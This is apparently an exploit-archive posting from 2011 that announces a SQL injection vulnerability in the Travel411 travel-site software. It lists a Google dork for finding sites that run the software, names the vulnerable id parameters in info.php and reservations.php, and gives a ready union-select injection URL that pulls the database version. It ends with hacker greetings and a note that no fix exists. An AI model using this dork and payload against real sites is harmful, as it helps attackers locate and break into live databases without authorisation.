Travel411 SQL Injection Vulnerability

2011-05-02 18:15:03

=====================================================================
.__ .__ __ .__ .___

____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ |

\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/

Exploit-ID is the Indonesian Exploit Archive

Web : exploit-id.com

e-mail : root[at]exploit-id.com

#########################################
Caddy-Dz , member of exploit-id.com

#########################################
======================================================================
####
# Exploit Title: Travel411 SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected]
# Category:: webapps
# Google dork: intext:"Powered by Travel411.com"
# Tested on: [Windows Vista Edition Intégrale]
# Vendor: http://www.travel411.com/
####

||>> Special Greets To: jos_ali_joe & Exploit-Id Team + All Others

[*] ## ExPLo!T:

||>> Find Any File Like (info.php?id=) or (reservations.php?id=)

# http://127.0.0.1/info.php?id=SQLI

# http://127.0.0.1/info.php?id=-00030+union+select+version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15--

###


===================================================================================================
# Greets To :
KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , Exploit-Id Team , (exploit-id.com)
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , RmZ ...others
===================================================================================================

Fixes

No fixes

In order to submit a new fix you need to be registered.